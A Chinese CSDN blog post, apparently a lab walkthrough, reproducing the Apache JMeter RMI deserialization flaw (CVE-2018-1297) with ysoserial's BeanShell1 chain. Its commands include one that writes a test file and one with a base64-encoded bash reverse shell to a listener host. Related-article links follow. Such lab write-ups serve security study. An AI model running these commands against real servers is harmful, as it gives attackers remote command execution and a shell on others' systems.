Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)

最新推荐文章于 2024-05-16 10:20:48 发布
最新推荐文章于 2024-05-16 10:20:48 发布
阅读量163 收藏
点赞数 4
分类专栏: apache漏洞 文章标签: jmeter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53639243/article/details/136370579
版权

Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。

我们只需要使用ysoserial.exploit.RMIRegistryExploit即可执行任意命令

直接使用ysoserial即可进行利用:

java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.92.130 1099 BeanShell1 'touch /tmp/success'

我们使用的是BeanShell1这条利用链。使用进入容器,可见已成功创建:

反弹shell连接: 这里推荐两个shell生成网站Online - Reverse Shell Generator[~]#棱角 ::Edge.Forum*

java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.92.130 1099 BeanShell1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEzNS85MDAxIDA+JjE=}|{base64,-d}|{bash,-i}'

先攻击机开启监听,然后运行上面的代码

反弹成功

青梅fox
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jmeter-plugins-cmn-jmeter-0.6.jar
08-20
Apache jmeter jmeter-plugins-cmn-jmeter-0.6.jar 下载
rmi远程反序列化rce漏洞_[原创]CVE-2018-1297jmeter_RMI漏洞复现
weixin_31423955的博客
12-23 433
jmeter_RMI_CVE-2018-1297复现5ecurity团队(5ecurity.cn)成员 zzw([email protected])原创发布
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1019
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
Apache JMeter rmi 反序列化 cve-2018-1297
whatday的专栏
08-07 461
漏洞描述 Severity: Important Vendor: The Apache Software Foundation Versions Affected: JMeter 2.X, 3.X Description [0]: When using Distributed Test only (RMI based), jmeter uses an unsecured RMI connection. This could allow an attacker to get Access to JM
apache-jmeter-5.6.3
01-08
apache-jmeter-5.6.3.zip apache-jmeter-5.6.3.tgz apache-jmeter-5.6.3_src.zip apache-jmeter-5.6.3_src.tgz
Apache JMeter (apache-jmeter-5.5.tgz)
06-24
Apache JMeter (apache-jmeter-5.5.tgz)可用于测试静态和动态资源、Web 动态应用程序的性能。 它可用于模拟服务器、服务器组、网络或对象上的重负载,以测试其强度或分析不同负载类型下的整体性能。 Apache JMeter...
Apache JMeter (apache-jmeter-5.5.zip)
06-24
Apache JMeter (apache-jmeter-5.5.zip)可用于测试静态和动态资源、Web 动态应用程序的性能。 它可用于模拟服务器、服务器组、网络或对象上的重负载,以测试其强度或分析不同负载类型下的整体性能。 Apache JMeter...
JMeter基础之--元件的作用域与执行顺序
02-25
前面有介绍过jmeter的元件类别,对于新手来说,jmeter的元件是还是不少的,如果我们按照每一个元件的每一个参数的含义去学习,无疑会降低学习性能测试的热情,就算我们熟悉了所有元件以及元件上的参数了,我们也不...
利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297
JiangBuLiu的博客
07-11 2373
Jmeter RMI 反序列化命令执行漏洞CVE-2018-1297)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现利用ysoserial检查结果 Vulnhub官方复现教程 https://vulhub.org/#/environments/jmeter/CVE-2018-1297/ 漏洞原理 Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编...
CVE-2018-0751
如鹿渴慕泉水的专栏
01-12 1374
using NtApiDotNet; using SandboxAnalysisUtils; using System; using System.Reflection; using System.Windows.Forms; namespace PoC { static class Program { static NtToken GetProcessToken
漏洞分析】Exim缓冲区溢出漏洞(CVE-2018-6789)
zzkk_的博客
03-13 937
Linux的邮件传输代理Exim被曝出存在一个漏洞CVE-2018-6789)。该漏洞源于base64解码函数中的一个缓冲区溢出问题。常规下base64编码的字符串的长度为4的倍数,但是有可能在传输或者恶意构造的情况下导致长度不为4的倍数,致使长度计算错误原文链接:【漏洞分析】Exim缓冲区溢出漏洞(CVE-2018-6789)...
CVE-2018-7600 Drupal漏洞原理的简单分析与复现
锋刃科技的博客
11-12 8345
0x00组件背景 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。 0x01漏洞位置 这里有个call_user_func_array call_user_func_array函数是调用第一个参数的函数 传入的参数数第二个参数数...
利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞CVE-2018-1000861)
JiangBuLiu的博客
07-11 4447
Jenkins远程命令执行漏洞CVE-2018-1000861)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现POC检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/ 漏洞原理 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这...
CVE-2018-12613 --- 本地文件包含造成远程代码执行漏洞复现
wkend的博客
12-26 3223
0x01 了解本地文件包含 LFI(本地文件包含),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 0x02 了解远程代码执行 RCE(远程代码执行),远程...
Jmeter:录制脚本(操作文档)
最新发布
铁之贝克的博客
05-16 201
【代码】Jmeter:录制api接口(操作文档)
jmeter命令执行命令
07-28
JMeter是一个用于性能测试和负载测试的开源工具。它可以通过命令执行测试计划。要在命令行中执行JMeter测试计划,你可以使用以下命令: ``` jmeter -n -t \[测试计划文件路径\] -l \[结果文件路径\] ``` 其中,`-n`表示以非GUI模式运行JMeter,`-t`后面跟着测试计划文件的路径,`-l`后面跟着结果文件的路径。 例如,如果你的测试计划文件名为`test.jmx`,结果文件名为`result.jtl`,你可以使用以下命令执行测试计划: ``` jmeter -n -t test.jmx -l result.jtl ``` 执行完毕后,JMeter将会运行测试计划并将结果保存到指定的结果文件中。 请注意,你需要确保在执行命令之前已经正确配置了JMeter环境,并且测试计划文件和结果文件的路径是正确的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值